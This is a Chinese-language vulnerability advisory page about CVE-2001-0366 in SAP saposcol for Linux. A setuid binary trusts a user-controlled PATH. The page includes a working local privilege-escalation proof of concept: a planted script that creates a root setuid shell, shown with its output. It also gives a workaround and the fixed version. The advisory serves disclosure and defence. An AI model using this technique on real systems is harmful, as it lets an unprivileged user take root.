首页 -> 安全研究

安全研究

安全漏洞
SAP Web Application Server 执行任意命令漏洞

发布日期:2001-05-04
更新日期:2001-05-04

受影响系统:

    SAP saposcol for Linux 1.3
    SAP saposcol for Linux 1.2
    SAP saposcol for Linux 1.1
    SAP saposcol for Linux 1.0
不受影响系统:

SAP saposcol for Linux 1.5
描述:

BUGTRAQ  ID: 2662
CVE(CAN) ID: CVE-2001-0366

本地用户可能通过修改环境变量迫使SAP执行其他程序。原报告是针对评估版的,很
可能商业版中也存在该漏洞,不过尚未确认。

<* 来源:Jochen Hein (jochen@jochen.org) *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


$ cat /tmp/expand
#!/bin/sh
cp /usr/bin/ksh /tmp/.sh
chmod 4755 /tmp/.sh
echo "done" > /tmp/blubber
$ ls -l /tmp/.sh /tmp/blubber
ls: /tmp/.sh: No such file or directory
ls: /tmp/blubber: No such file or directory
$ export PATH=/tmp:$PATH
$ /usr/sap/WAS/SYS/exe/run/saposcol
Starting collector (create new process)
$ ls -l /tmp/.sh /tmp/blubber
-rwsr-xr-x 1 root sapdb   162448   Apr 9 21:00 /tmp/.sh
-rw-r--r-- 1 root sapdb        5   Apr 9 21:00 /tmp/blubber



建议:

临时解决方案是chmod u-s /usr/sap/WAS/SYS/exe/run/saposcol

    SAP 提供的升级版已经修正了该漏洞

    SAP upgrade saposcol for Linux 1.5
    ftp://ftp.sap.com/pub/linuxlab/saptools/saposcol



浏览次数:3875
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障